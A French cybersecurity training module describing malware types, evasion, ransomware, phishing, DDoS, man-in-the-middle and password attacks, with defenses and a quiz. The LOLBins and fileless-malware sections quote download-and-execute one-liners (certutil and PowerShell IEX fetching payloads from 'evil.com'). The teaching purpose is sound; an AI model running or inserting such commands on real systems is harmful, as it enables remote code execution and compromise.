Module 13 β€” Attaques & Monitoring

Common Threats

Explore en detail les menaces les plus courantes : malwares, phishing, DDoS, Man-in-the-Middle, attaques sur les mots de passe et bien plus.

  • Identifier et classifier les differents types de malware
  • Reconnaitre les techniques de phishing et d'ingenierie sociale
  • Comprendre les attaques DDoS et Man-in-the-Middle
  • Connaitre les methodes d'attaque sur les mots de passe

🦠 13.1 β€” Malware en detail

Le terme malware (malicious software) designe tout logiciel concu pour endommager, perturber ou obtenir un acces non autorise a un systeme. Voici les principaux types :

Imagine les malwares comme differentes maladies. Un virus a besoin d'un contact pour se propager, un ver se transmet par l'air, un cheval de Troie se deguise en medicament bienfaisant, et un ransomware prend tes organes en otage contre une rancon. Chaque maladie a ses symptomes, ses vecteurs et ses traitements.

TypeComportementVecteur principalImpactExemple reel
Virus S'attache a un fichier hote, se replique quand le fichier est execute Fichiers infectes, cles USB Corruption de fichiers, ralentissement ILOVEYOU (2000)
Worm Se propage automatiquement sur le reseau sans interaction Vulnerabilites reseau Consommation de bande passante, propagation massive WannaCry, Conficker
Trojan Se deguise en logiciel legitime Telechargements, faux logiciels Backdoor, vol de donnees Emotet, Zeus
Ransomware Chiffre les fichiers et exige une rancon Email, exploit kits, RDP Perte d'acces aux donnees, cout financier LockBit, REvil, Ryuk
Spyware Espionne l'activite de l'utilisateur silencieusement Bundled software, sites compromis Vol d'informations personnelles Pegasus, FinFisher
Adware Affiche des publicites non desirees Logiciels gratuits, extensions navigateur Nuisance, tracking, redirection Fireball, DealPly
Rootkit S'installe au niveau le plus profond du systeme (kernel) Exploits, malware avance Acces total cache, tres difficile a detecter Sony BMG Rootkit, ZeroAccess
Keylogger Enregistre toutes les frappes clavier Trojan, acces physique Vol de mots de passe, d'informations sensibles Agent Tesla, HawkEye
Fileless Malware S'execute en memoire sans fichier sur le disque Scripts PowerShell, macros, WMI Evasion des antivirus traditionnels Astaroth, Kovter
Cryptominer Utilise les ressources du systeme pour miner de la cryptomonnaie Sites web, malware, extensions Ralentissement, surconsommation electrique Coinhive, XMRig
Tendance actuelle
Le fileless malware est en forte augmentation car il echappe aux antivirus traditionnels qui se basent sur l'analyse de fichiers. Il s'execute directement en memoire via PowerShell, WMI ou des macros Office.

Techniques d'evasion des malwares

TechniqueDescriptionExempleDetection
Polymorphic Le malware modifie son code (chiffrement avec cle variable) a chaque propagation, mais garde la meme fonctionnalite Virlock, Storm Worm Analyse heuristique, machine learning, sandboxing
Metamorphic Le malware reecrit completement son code a chaque iteration (pas juste chiffrement) β€” plus avance que le polymorphisme Zmist, Regswap Analyse comportementale, emulation
Fileless S'execute entierement en memoire sans ecrire sur le disque. Utilise des outils systeme legitimes (PowerShell, WMI, .NET) Astaroth, Kovter, PowerGhost EDR, monitoring de PowerShell, AMSI, memory forensics
Living-off-the-Land (LOLBins) Utilise des outils systeme legitimes deja presents (certutil, mshta, regsvr32, rundll32, wmic, bitsadmin) pour executer du code malveillant APT29 (Cobalt Strike via rundll32), Emotet (via PowerShell) Monitoring des processus parents/enfants, regles Sigma, AMSI
Packing / Crypting Compression et chiffrement du binaire malveillant pour eviter la detection par signature UPX, Themida, custom packers Analyse entropie, unpacking dynamique, sandbox
Anti-sandbox Detecte s'il s'execute dans une VM/sandbox et modifie son comportement (dort, ne fait rien) Verification de processus VM, resolution d'ecran, mouvement de souris Sandboxes avancees avec interaction simulee, bare-metal analysis
Anti-debug Detecte la presence de debuggers et refuse de s'executer IsDebuggerPresent(), timing checks, NtQueryInformationProcess Debuggers furtifs, patching des checks anti-debug
LOLBins courants (Living off the Land Binaries)

Binaires Windows legitimes abuses par les attaquants :

  • certutil.exe β€” Telecharger des fichiers (certutil -urlcache -split -f http://evil.com/mal.exe)
  • mshta.exe β€” Executer du code HTA/VBScript
  • regsvr32.exe β€” Charger des DLL distantes (Squiblydoo attack)
  • rundll32.exe β€” Executer des fonctions dans des DLL
  • powershell.exe β€” Execution de scripts en memoire (IEX (New-Object Net.WebClient).DownloadString(...))
  • bitsadmin.exe β€” Telecharger des fichiers via le service BITS
  • wmic.exe β€” Execution de commandes a distance, creation de processus

Ransomware en detail

Chaine d'infection typique d'un ransomware

  1. Acces initial : Phishing (piece jointe malveillante), exploitation RDP expose, VPN vulnerable, supply chain
  2. Execution du loader : Macro Office, script PowerShell, DLL sideloading
  3. Mouvement lateral : Mimikatz (credential dumping), PsExec, WMI, exploitation SMB
  4. Escalade de privileges : Obtenir des droits Domain Admin
  5. Preparation : Desactiver les sauvegardes (Volume Shadow Copies), desactiver l'antivirus, exfiltrer les donnees
  6. Deploiement : Chiffrement massif via GPO, PsExec ou outil custom
  7. Rancon : Note de rancon (.txt ou .html), paiement en crypto (Bitcoin, Monero), site .onion de negociation

Evolution des modeles d'extorsion

TypeDescriptionPremiere apparition
Simple extorsionChiffrement des donnees, demande de rancon pour la cle de dechiffrementCryptoLocker (2013)
Double extorsionChiffrement + menace de publication des donnees volees sur un site de leakMaze (2019)
Triple extorsionDouble extorsion + DDoS sur la victime ou contact direct des clients/partenairesREvil, SunCrypt (2020)
Quadruple extorsionTriple + pression sur les employes, partenaires commerciaux, regulateursGroupes recents (2021+)

Ransomwares majeurs

NomAnneeImpactParticularite
WannaCry2017200 000+ systemes dans 150 pays, NHS UK paralyseExploit EternalBlue (SMBv1), propagation worm, attribue a Lazarus Group
NotPetya201710 milliards $ de degats mondiaux (Maersk, Merck, FedEx)Deguise en ransomware mais wiper destructeur, supply chain via MeDoc (Ukraine)
Ryuk2018-2021Hopitaux, collectivites, entreprises, rancons de plusieurs millionsBig game hunting (cibles a forte valeur), deploiement manuel, souvent via TrickBot/Emotet
Conti2020-2022Costa Rica (etat d'urgence), HSE Irlande (sante)Operation structuree comme une entreprise (RH, dev, negociateurs), code source leake en 2022
LockBit2019-presentPlus prolifique des RaaS, milliers de victimes mondialesChiffrement le plus rapide, programme de bug bounty, auto-propagation StealBit

Ransomware-as-a-Service (RaaS)

Le modele RaaS fonctionne comme une franchise criminelle :

RoleResponsabilitePart des revenus
Developpeurs (Operators)Creent le ransomware, le panel d'administration, le site de leak, l'infrastructure C220-30%
AffiliesObtiennent l'acces initial, se deplacent lateralement, deploient le ransomware70-80%
Access Brokers (IAB)Vendent des acces initiaux (RDP, VPN, credentials) aux affiliesPrix fixe (500$ - 100 000$+)
NegociateursNegocient la rancon avec les victimes via chat TorVariable

Indicateurs de compromission (IoC) par type de malware

Type d'IoCDescriptionExempleOutil de detection
File Hash (MD5, SHA-1, SHA-256)Empreinte unique d'un fichier malveillantSHA-256: d7a95...VirusTotal, YARA, EDR
IP AddressesAdresses IP des serveurs C2 ou d'exfiltration185.234.xx.xxFirewall logs, SIEM, threat intel feeds
Domain NamesDomaines utilises pour le C2, phishing, exfiltrationevil-update.com, DGA domainsDNS logs, proxy logs, passive DNS
URLsURLs specifiques de telechargement ou de C2http://evil.com/payload.exeProxy logs, web gateway
Email IndicatorsAdresses email, subjects, attachments d'emails de phishinginvoice@fake-bank.comEmail gateway, SPF/DKIM/DMARC
YARA RulesRegles de pattern matching pour identifier des malwares par leur contenu binairerule Emotet { strings: $s1 = "RegWriteStringValue" condition: all of them }YARA, ClamAV, EDR
Registry KeysCles de registre Windows creees ou modifiees pour la persistenceHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunSysmon, EDR, FIM
Mutex / Named PipesObjets de synchronisation crees par le malwareGlobal\MsWinZonesCacheCounterMutexAProcess monitoring, Sysmon

🎣 13.2 β€” Phishing en detail

Le phishing est la technique d'ingenierie sociale la plus repandue. Elle consiste a se faire passer pour une entite de confiance afin de voler des informations sensibles.

Le phishing, c'est comme un pecheur. Il lance un appat (email, SMS, appel) dans l'eau (internet) en esperant qu'un poisson (victime) morde a l'hamecon. Plus l'appat ressemble a de la vraie nourriture, plus les chances de succes sont elevees.

Email Phishing (classique)

Envoi massif d'emails frauduleux imitant des organisations legitimes (banques, services en ligne, administration).

  • Volume : Envoye a des milliers/millions de destinataires
  • Personnalisation : Faible β€” message generique
  • Objectif : Voler des identifiants, installer un malware
  • Taux de succes : Faible individuellement, mais efficace en masse

Spear Phishing

Phishing cible visant une personne ou un groupe specifique.

  • Volume : Quelques cibles selectionnees
  • Personnalisation : Elevee β€” utilise des informations reelles (nom, poste, projets)
  • Objectif : Acces a des systemes specifiques, vol de donnees sensibles
  • Taux de succes : Beaucoup plus eleve que le phishing classique
Statistique
91% des cyberattaques commencent par un email de spear phishing.

Whaling ("chasse a la baleine")

Spear phishing visant specifiquement les dirigeants et cadres superieurs (C-level : CEO, CFO, CTO).

  • Cibles : PDG, directeurs financiers, membres du conseil
  • Methode : Emails tres professionnels, souvent lies a des affaires juridiques ou financieres
  • Impact : Potentiellement devastateur β€” ces cibles ont des acces privilegies

Variante β€” BEC (Business Email Compromise) : L'attaquant usurpe l'identite du CEO pour demander un virement urgent au service financier.

Vishing & Smishing

Vishing (Voice Phishing) : Phishing par telephone. L'attaquant se fait passer pour un support technique, une banque ou une autorite.

Smishing (SMS Phishing) : Phishing par SMS. Messages avec liens malveillants pretendant etre un colis en attente, une alerte bancaire, etc.

  • Le vishing exploite la confiance vocale et l'urgence
  • Le smishing exploite la rapidite de reaction sur mobile
  • Les deux contournent les filtres email anti-phishing

Comment identifier un phishing ?

🚩

Red Flags a verifier

Signaux d'alerte dans un email suspect

ElementSignal d'alerte
ExpediteurAdresse email qui ne correspond pas au domaine officiel (ex: support@amaz0n-security.com)
ObjetUrgence artificielle ("Votre compte sera ferme dans 24h !")
SalutationGenerique ("Cher client" au lieu de votre nom)
LiensURL qui ne correspond pas au site officiel (survoler avant de cliquer)
Pieces jointesFichiers inattendus (.exe, .zip, .docm, .js)
OrthographeFautes de grammaire et de syntaxe inhabituelles
DemandeDemande d'informations sensibles (mot de passe, numero de carte)

Analyse des headers email : SPF, DKIM, DMARC

Les protocoles d'authentification email permettent de verifier la legitimite d'un email et de detecter le spoofing :

ProtocoleFonctionVerificationHeader a verifier
SPF (Sender Policy Framework) Verifie que le serveur d'envoi est autorise a envoyer des emails pour ce domaine Compare l'IP de l'expediteur avec la liste d'IP autorisees dans l'enregistrement DNS TXT du domaine Received-SPF: pass ou fail
DKIM (DomainKeys Identified Mail) Verifie l'integrite du message avec une signature cryptographique Le serveur recepteur verifie la signature DKIM avec la cle publique dans le DNS du domaine expediteur DKIM-Signature: v=1; a=rsa-sha256; d=example.com
DMARC (Domain-based Message Authentication, Reporting and Conformance) Politique du domaine qui dit quoi faire si SPF/DKIM echouent (none, quarantine, reject) Combine les resultats SPF et DKIM avec la politique DMARC du domaine Authentication-Results: dmarc=pass policy.dmarc=reject
Verification rapide des headers

Dans un email suspect, chercher dans les headers : Authentication-Results β€” si SPF=fail, DKIM=fail ou DMARC=fail, l'email est probablement du spoofing.

Techniques d'URL malveillantes

TechniqueDescriptionExemple
Typosquatting Enregistrement de domaines avec des fautes de frappe courantes gogle.com, microsft.com, facebo0k.com
Homoglyph / IDN attack Utilisation de caracteres Unicode visuellement identiques aux caracteres latins (cyrillique, grec) apple.com vs аpple.com (le 'a' est cyrillique), paypal.com vs pаypal.com
Subdomain abuse Utilisation de sous-domaines trompeurs sur un domaine controle par l'attaquant login.microsoft.com.evil-site.com
URL shortening Masquer l'URL reelle derriere un raccourcisseur (bit.ly, tinyurl) bit.ly/3xMalware β†’ redirection vers un site de phishing
Data URI Encoder du contenu directement dans l'URL pour afficher une fausse page data:text/html;base64,PHNjcml...
Open Redirect Exploiter une redirection legitime sur un site de confiance trusted.com/redirect?url=http://evil.com

Social Engineering Lifecycle (4 phases)

Cycle de l'ingenierie sociale
1. Research (Recherche)

Collecte d'informations sur la cible : reseaux sociaux, organigramme, habitudes, centres d'interet, fournisseurs. L'attaquant prepare un pretexte credible.

2. Hook (Accroche)

Premier contact avec la cible. L'attaquant etablit un rapport de confiance en exploitant : l'autorite, l'urgence, la reciprocite, la rarete, la sympathie ou la preuve sociale.

3. Play (Exploitation)

La victime effectue l'action souhaitee : clique sur un lien, revele des informations, ouvre une piece jointe, effectue un virement, donne un acces physique.

4. Exit (Sortie)

L'attaquant met fin a l'interaction sans eveiller de soupcons. La victime ne realise pas qu'elle a ete manipulee (ou ne le realise que bien plus tard).

🌊 13.3 β€” DDoS (Distributed Denial of Service)

Une attaque DDoS vise a rendre un service indisponible en le submergeant de trafic provenant de multiples sources (souvent un botnet).

Imagine un restaurant. Si 10 000 personnes entrent en meme temps et occupent toutes les tables sans rien commander, les vrais clients ne peuvent plus etre servis. Le restaurant est "hors service" meme s'il n'est pas physiquement detruit. C'est le principe du DDoS.

Attaques volumetriques

Saturer la bande passante de la cible avec un volume enorme de trafic.

  • UDP Flood : Envoi massif de paquets UDP vers des ports aleatoires
  • DNS Amplification : Exploite des serveurs DNS ouverts pour amplifier le trafic (facteur x50-x70)
  • NTP Amplification : Meme principe avec des serveurs NTP

Volume : Peut atteindre plusieurs Tbps (terabits par seconde).

Attaques protocolaires

Exploiter les faiblesses des protocoles reseau pour epuiser les ressources.

  • SYN Flood : Inonde le serveur de requetes SYN sans completer le three-way handshake TCP
  • Ping of Death : Paquets ICMP surdimensionnes
  • Smurf Attack : ICMP broadcast avec adresse source usurpee

Cible : La table de connexions du serveur ou du firewall.

Attaques de couche applicative (Layer 7)

Cibler des fonctionnalites specifiques de l'application pour epuiser ses ressources.

  • HTTP Flood : Envoi massif de requetes HTTP GET/POST qui semblent legitimes
  • Slowloris : Maintient des connexions HTTP ouvertes le plus longtemps possible
  • DNS Query Flood : Sature le serveur DNS avec des requetes complexes

Difficulte : Plus difficile a detecter car le trafic ressemble a du trafic normal.

Botnets et amplification

Un botnet est un reseau de machines compromises (zombies) controlees par un attaquant (botmaster).

  • Mirai (2016) : Botnet IoT qui a infecte des cameras, routeurs et DVR pour lancer une attaque DDoS de 1.2 Tbps contre Dyn DNS, rendant indisponibles Twitter, Netflix, Reddit et d'autres services majeurs
  • Amplification : L'attaquant envoie de petites requetes a des serveurs mal configures (DNS, NTP, Memcached) avec l'adresse IP source usurpee de la victime. Les reponses, bien plus volumineuses, sont dirigees vers la cible
Facteurs d'amplification
DNS : x28-70 | NTP : x556 | Memcached : x51 000. Une requete de 1 Ko peut generer une reponse de 51 Mo avec Memcached.

Facteurs d'amplification detailles

ProtocolePortFacteur d'amplificationRequete utiliseeRecord d'attaque
DNSUDP/53x54 (moyen)Requete ANY sur un domaine avec large zone file400 Gbps (2014, CloudFlare)
NTPUDP/123x556Commande MONLIST (liste des 600 derniers clients)400 Gbps (2014, NTP)
MemcachedUDP/11211x51 000Requete GET apres avoir injecte des donnees volumineuses1.7 Tbps (2018, GitHub)
SSDPUDP/1900x30Requete M-SEARCH (UPnP discovery)Cible les appareils IoT non securises
CLDAPUDP/389x70Requete LDAP connectionlessServeurs Active Directory exposes
ChargenUDP/19x358Requete au service character generator (legacy)Service obsolete encore actif sur certains systemes

Mirai Botnet β€” Anatomie

πŸ€–

Mirai (2016)

Le botnet qui a change l'IoT

  • Cibles : Appareils IoT (cameras IP, DVR, routeurs) avec credentials par defaut (admin/admin, root/root)
  • Propagation : Scan Telnet (port 23) + dictionnaire de 62 couples login/password par defaut
  • Taille : 300 000 a 600 000 appareils compromis
  • Attaque majeure : 1.2 Tbps contre Dyn DNS (21 octobre 2016) β€” Twitter, Netflix, Reddit, GitHub, CNN indisponibles
  • Impact : Source code publie sur HackForums, centaines de variantes creees depuis (Okiru, Satori, Masuta)
  • Lecon : L'IoT non securise est un vecteur massif de DDoS. La securite by default est critique.

Strategies de mitigation DDoS

StrategieDescriptionNiveau
Scrubbing CentersRedirige le trafic vers un centre de nettoyage qui filtre le trafic malveillant et ne laisse passer que le trafic legitime (Akamai, Cloudflare, AWS Shield)Cloud/ISP
CDN (Content Delivery Network)Distribue le contenu sur de multiples serveurs geographiquement repartis, absorbant le trafic DDoSApplication
Rate LimitingLimiter le nombre de requetes par IP/session par unite de tempsApplication/Reseau
BGP BlackholingAnnoncer une route nulle (blackhole) pour l'IP attaquee aupres des routeurs upstreamISP/Reseau
Anycast RoutingDistribuer le trafic sur plusieurs points de presence (PoP) pour absorber les picsInfrastructure
SYN CookiesMecanisme du kernel qui permet de gerer les SYN floods sans consommer de memoire pour les half-open connectionsOS/Serveur
WAF (Web Application Firewall)Filtre les requetes Layer 7 malveillantes (HTTP floods, Slowloris)Application

πŸ‘€ 13.4 β€” Man-in-the-Middle (MitM)

Dans une attaque MitM, l'attaquant s'insere entre deux parties communicantes pour intercepter, lire ou modifier les echanges sans que les victimes ne le sachent.

Imagine que tu envoies une lettre a un ami. Un facteur malveillant ouvre la lettre, la lit (voire la modifie), la remet dans l'enveloppe et la livre comme si de rien n'etait. Ni toi ni ton ami ne savez que la lettre a ete lue. C'est le Man-in-the-Middle.

Techniques Man-in-the-Middle courantes
πŸ”€ ARP Spoofing / ARP Poisoning

L'attaquant envoie de fausses reponses ARP sur le reseau local pour associer son adresse MAC a l'adresse IP de la passerelle (gateway).

Resultat : Tout le trafic du reseau local passe par la machine de l'attaquant.

Outil : arpspoof, Ettercap, Bettercap

Defense : Dynamic ARP Inspection (DAI), VLAN, chiffrement.

🌐 DNS Spoofing / DNS Poisoning

L'attaquant falsifie les reponses DNS pour rediriger la victime vers un faux site web.

Resultat : La victime croit etre sur le vrai site (banque, email) alors qu'elle est sur un site controle par l'attaquant.

Outil : dnsspoof, Ettercap

Defense : DNSSEC, DNS over HTTPS (DoH), verification des certificats SSL.

πŸ”“ SSL Stripping

L'attaquant intercepte la connexion et degrade HTTPS en HTTP, empechant le chiffrement.

Resultat : Les donnees (mots de passe, etc.) transitent en clair sans que la victime ne le remarque.

Outil : sslstrip, mitmproxy

Defense : HSTS (HTTP Strict Transport Security), verification du cadenas HTTPS.

πŸ“‘ Evil Twin Wi-Fi

L'attaquant cree un faux point d'acces Wi-Fi avec le meme nom (SSID) qu'un reseau legitime (cafe, hotel, aeroport).

Resultat : Les victimes se connectent au faux Wi-Fi et tout leur trafic est intercepte.

Outil : Airgeddon, WiFi Pumpkin, hostapd

Defense : VPN, ne pas se connecter aux Wi-Fi publics ouverts, verifier les certificats.

πŸ”‘ 13.5 β€” Attaques sur les mots de passe

Les mots de passe restent le mecanisme d'authentification le plus repandu et le plus cible par les attaquants.

Essayer systematiquement toutes les combinaisons possibles jusqu'a trouver le bon mot de passe.

LongueurCaracteresCombinaisonsTemps approximatif
6 caracteresMinuscules309 millionsQuelques secondes
8 caracteresMixte + symboles6 000 milliardsQuelques heures
12 caracteresMixte + symboles475 000 000 milliardsPlusieurs siecles

Defense : Mots de passe longs, lockout apres X tentatives, MFA.

Utiliser une liste de mots de passe courants (dictionnaire) plutot que de tester toutes les combinaisons.

  • Les listes incluent les mots de passe les plus frequents : "password", "123456", "qwerty"...
  • Incluent aussi des variations : "P@ssw0rd", "Password1!", "admin123"
  • La liste rockyou.txt contient plus de 14 millions de mots de passe reels leakes

Defense : Ne jamais utiliser de mots du dictionnaire, utiliser un gestionnaire de mots de passe.

Utiliser des identifiants (email + mot de passe) voles lors de breches de donnees pour tenter de se connecter a d'autres services.

  • Exploite le fait que 65% des utilisateurs reutilisent le meme mot de passe sur plusieurs sites
  • Des milliards de credentials sont disponibles sur le dark web
  • Attaque automatisee avec des outils comme Sentry MBA, OpenBullet

Defense : Ne jamais reutiliser les mots de passe, MFA, monitoring des connexions inhabituelles.

Tables precalculees contenant des hash et leurs mots de passe correspondants. Permet un "reverse lookup" instantane.

  • Au lieu de calculer le hash en temps reel, on consulte une table deja calculee
  • Extremement rapide pour les hash non sales (unsalted)
  • Les tables peuvent peser plusieurs teraoctets

Defense : Toujours utiliser un salt (valeur aleatoire ajoutee avant le hashing). Utiliser des algorithmes lents (bcrypt, Argon2).

L'attaquant utilise directement le hash NTLM d'un mot de passe (sans le casser) pour s'authentifier sur d'autres systemes Windows.

  • Pas besoin de connaitre le mot de passe en clair
  • Exploite le protocole d'authentification NTLM de Windows
  • Permet le lateral movement dans un reseau Active Directory
  • Outils : Mimikatz, Impacket

Defense : Desactiver NTLM, utiliser Kerberos, Credential Guard, comptes privilegies dedies.

Temps de craquage selon la complexite (GPU RTX 4090, hash NTLM)

LongueurMinuscules seules+ Majuscules+ Chiffres+ Symboles (95 chars)
6 chars< 1 sec< 1 sec< 1 sec< 1 sec
8 chars5 sec22 min1 heure7 heures
10 chars59 min1 mois7 mois5 ans
12 chars2 semaines200 ans2 000 ans30 000 ans
16 chars1 200 ansmilliards d'anneesmilliards d'anneesmilliards d'annees

Role du Salt dans le hashing

πŸ§‚

Salt (sel)

Protection contre les rainbow tables

Un salt est une valeur aleatoire unique ajoutee au mot de passe AVANT le hashing :

hash = H(salt + password) au lieu de hash = H(password)

  • Sans salt : Le meme mot de passe produit toujours le meme hash β†’ vulnerable aux rainbow tables
  • Avec salt : Le meme mot de passe produit un hash different pour chaque utilisateur β†’ rainbow tables inutiles
  • Le salt est stocke en clair a cote du hash (il n'a pas besoin d'etre secret)
  • Algorithmes recommandes : bcrypt, scrypt, Argon2 (algorithmes lents et sales par design)
  • Algorithmes a eviter : MD5, SHA-1, SHA-256 seuls (trop rapides, non sales par defaut)

⚑ 13.6 β€” Menaces avancees (Advanced Threats)

πŸ’§

Watering Hole Attack

Compromission de site strategique

L'attaquant identifie les sites web frequemment visites par sa cible et les compromet en y injectant du code malveillant.

Analogie : Au lieu de chasser le lion, le predateur empoisonne le point d'eau ou le lion vient boire. Il suffit d'attendre.

Processus : 1) Identifier les sites visites par la cible (OSINT) β†’ 2) Trouver une vulnerabilite sur ce site β†’ 3) Injecter un exploit kit β†’ 4) Attendre que la cible visite le site β†’ 5) Exploitation automatique

Exemple reel : Le groupe APT Turla a compromis des sites gouvernementaux pour cibler des diplomates. Le groupe Lazarus a cible des sites financiers polonais en 2017.

Defense : Mise a jour des navigateurs, sandboxing, monitoring du trafic web, segmentation reseau.

πŸš—

Drive-by Download

Telechargement automatique et invisible

Un malware se telecharge et s'installe automatiquement simplement en visitant un site web compromis ou malveillant, sans aucune action de l'utilisateur.

Exploite des vulnerabilites dans le navigateur, ses plugins (Flash, Java) ou le systeme d'exploitation.

Chaine d'exploitation : Site web compromis β†’ Redirect vers exploit kit (RIG, Magnitude) β†’ Detection du navigateur/OS/plugins β†’ Selection de l'exploit adapte β†’ Telechargement et execution du payload

Defense : Mise a jour du navigateur et des plugins, desactiver les plugins inutiles, ad blockers, sandboxing navigateur.

πŸ”—

Supply Chain Attack

Compromettre la chaine d'approvisionnement

L'attaquant compromet un fournisseur de logiciel ou un composant de la supply chain pour atteindre la cible finale (les clients du fournisseur).

Exemples majeurs :

  • SolarWinds (2020) : Backdoor SUNBURST injectee dans la mise a jour d'Orion, 18 000 organisations touchees dont le Tresor americain et Microsoft
  • Kaseya VSA (2021) : Exploitation d'une zero-day dans le logiciel de gestion IT, 1 500 entreprises touchees par REvil
  • NotPetya (2017) : Malware distribue via la mise a jour du logiciel comptable ukrainien MeDoc
  • Codecov (2021) : Script de CI/CD compromis, exfiltration de variables d'environnement et secrets

Defense : Verification d'integrite des mises a jour (checksums, signatures), monitoring du comportement des logiciels, SBOM (Software Bill of Materials), Zero Trust.

πŸ‘»

Fileless Malware & LOLBins

Attaques sans fichier et binaires du systeme

Le fileless malware s'execute entierement en memoire en utilisant des outils deja presents sur le systeme (Living off the Land Binaries).

Chaine d'attaque typique :

  1. Email de phishing avec lien ou macro VBA
  2. Macro lance PowerShell en memoire
  3. PowerShell telecharge et execute un payload directement en RAM (IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1'))
  4. Le payload utilise des LOLBins (certutil, regsvr32, mshta) pour les actions suivantes
  5. Aucun fichier malveillant n'est ecrit sur le disque

Pourquoi c'est difficile a detecter : Les antivirus traditionnels scannent les fichiers sur disque, pas la memoire. Les processus utilises (PowerShell, WMI) sont legitimes.

Defense : EDR avec monitoring memoire, AMSI (Antimalware Scan Interface), journalisation PowerShell (ScriptBlock Logging, Module Logging), desactiver PowerShell v2, application whitelisting (AppLocker).

⌨️

Typosquatting

Exploitation des fautes de frappe

Enregistrer des noms de domaine similaires a des sites populaires en exploitant les fautes de frappe courantes.

Exemples : gogle.com, facebo0k.com, amaz0n.com, microsft.com

Le site frauduleux imite parfaitement le site original pour voler des identifiants.

Defense : Utiliser les favoris, verifier l'URL, protection du navigateur, DMARC pour les domaines proches.

πŸ’€

Zero-Day

Vulnerabilite inconnue et non corrigee

Une vulnerabilite zero-day est une faille inconnue de l'editeur du logiciel. Il n'existe aucun correctif (patch) au moment de l'exploitation.

Pourquoi "zero-day" ? Le developpeur a "zero jour" pour corriger la faille car elle est deja exploitee.

Les zero-days sont extremement precieux : ils se vendent entre 100 000 $ et 2,5 millions $ sur le marche noir.

Defense : Defense en profondeur, EDR, comportemental, sandboxing, segmentation reseau.

πŸ”¬ 13.7 β€” Exercice : Identifie la menace

Pour chaque scenario, fais glisser l'etiquette vers le type de menace correspondant :

Un hopital ne peut plus acceder a ses dossiers patients, un message exige 5 BTC
Un email de "Microsoft" demande de verifier votre compte via un lien
Un site e-commerce est inaccessible, le trafic entrant atteint 500 Gbps
Sur un Wi-Fi public, un attaquant intercepte vos identifiants bancaires
Des comptes Netflix sont pirates avec des identifiants leakes de LinkedIn
Une faille non corrigee dans Chrome est exploitee avant que Google ne la decouvre

πŸ” Ransomware

Depose ici

🎣 Phishing

Depose ici

🌊 DDoS

Depose ici

πŸ‘€ Man-in-the-Middle

Depose ici

♻️ Credential Stuffing

Depose ici

πŸ’€ Zero-Day

Depose ici

🎭 13.8 β€” Acteurs de la menace et concepts fondamentaux

Comprendre qui attaque et pourquoi est aussi important que de comprendre le comment. Voici la classification des acteurs et les concepts de base de la gestion des risques.

Classification des hackers par Β« chapeau Β»

TypeIntentionLegaliteExemples
White Hat (chapeau blanc)Proteger les systemes, trouver et corriger les vulnerabilitesLegal β€” avec autorisationPentesters, chercheurs en securite, bug bounty hunters
Black Hat (chapeau noir)Exploiter les systemes pour profit, destruction ou espionnageIllegalCybercriminels, groupes APT, script kiddies malveillants
Gray Hat (chapeau gris)A mi-chemin β€” agit sans autorisation mais souvent sans intention malveillanteZone grise legaleHacktivistes, vulnerability brokers (courtiers en vulnerabilites)

Types d'acteurs de la menace

Acteurs inexperimentes qui utilisent des scripts, outils et exploits existants sans comprendre leur fonctionnement interne.

  • Motivation : curiosite, prestige, vandalisme
  • Competence : faible β€” dependent d'outils automatises
  • Danger : significatif malgre leur ignorance (les outils sont puissants)

Acteurs qui protestent publiquement contre des entreprises ou des gouvernements en utilisant des cyberattaques comme forme d'activisme.

  • Motivation : politique, sociale, ideologique
  • Methodes : defacement de sites, DDoS, fuites de donnees
  • Exemples : Anonymous, LulzSec
  • Classification : Gray Hat β€” agissent pour une cause mais sans autorisation

Acteurs qui decouvrent des exploits et les signalent aux editeurs (ou les vendent). Ils recherchent des vulnerabilites pour obtenir une recompense ou un profit.

  • Motivation : financiere (bug bounty, revente) ou ethique
  • Methodes : recherche de vulnerabilites, reverse engineering, fuzzing
  • Classification : Gray Hat β€” entre White Hat (signalement responsable) et Black Hat (vente sur le dark web)
  • Plateformes : HackerOne, Bugcrowd, Zerodium (achat d'exploits)

Hackers finances et diriges par des gouvernements pour voler des secrets d'Etat, conduire des operations de sabotage ou mener de l'espionnage industriel.

  • Motivation : espionnage, sabotage, avantage geopolitique
  • Competence : tres elevee β€” acces a des ressources illimitees
  • Exemples : APT28 (Russie), APT41 (Chine), Lazarus Group (Coree du Nord), Equation Group (USA)
  • Classification : Black Hat meme si soutenu par un Etat

Groupes organises motives par le profit financier : ransomware, fraude, vol de donnees.

  • Modeles : RaaS, Initial Access Brokers, Money Mules
  • Exemples : LockBit, Conti, REvil, FIN7

Concepts fondamentaux de securite

ConceptDefinitionExemple
Menace (Threat)Tout danger potentiel pour une ressource informatiqueUn groupe APT ciblant une entreprise
Vulnerabilite (Vulnerability)Une faille ou faiblesse dans un systeme qui peut etre exploiteeUn serveur non patche avec CVE-2017-0144
ExploitLe mecanisme utilise pour compromettre une ressource en tirant parti d'une vulnerabiliteLe module Metasploit EternalBlue
Risque (Risk)La probabilite que des consequences indesirables se produisent (menace x vulnerabilite x impact)Probabilite elevee si serveur expose avec vulnΓ©rabilite connue

Strategies de gestion des risques

StrategieDescriptionExemple
Acceptation (Risk Acceptance)Le cout de la protection depasse le cout du risque β€” on accepte le risque en connaissance de causeUn administrateur estime que la vulnerabilite a un impact faible et decide de ne rien faire
Evitement (Risk Avoidance)On elimine l'activite qui cree le risqueDesactiver un service non essentiel vulnerable
Reduction (Risk Reduction)On reduit la probabilite ou l'impact du risquePatcher un systeme, ajouter un firewall
Transfert (Risk Transfer)On transfere le risque a un tiersSouscrire une cyberassurance, externaliser l'hebergement
A retenir pour l'examen : Si le cout de gestion d'une vulnerabilite depasse le cout du risque, et que l'organisation decide de ne rien faire, elle adopte une strategie d'acceptation du risque (risk acceptance).

πŸ“ 13.9 β€” Quiz de revision

Points cles du Module 13

  • Les malwares ont de nombreuses formes (virus, worms, trojans, ransomware, spyware, rootkits, fileless) avec des techniques d'evasion avancees (polymorphic, metamorphic, LOLBins)
  • Le ransomware a evolue vers la double/triple extorsion et le modele RaaS (Ransomware-as-a-Service) avec des groupes comme LockBit, Conti, REvil
  • Le phishing est le vecteur #1 β€” verifier SPF, DKIM, DMARC dans les headers. Attention aux attaques homoglyphes et typosquatting
  • Les attaques DDoS exploitent des facteurs d'amplification massifs : DNS x54, NTP x556, Memcached x51 000. Mitigation : scrubbing, CDN, rate limiting
  • Le Man-in-the-Middle exploite ARP spoofing, DNS spoofing, SSL stripping ou Evil Twin Wi-Fi
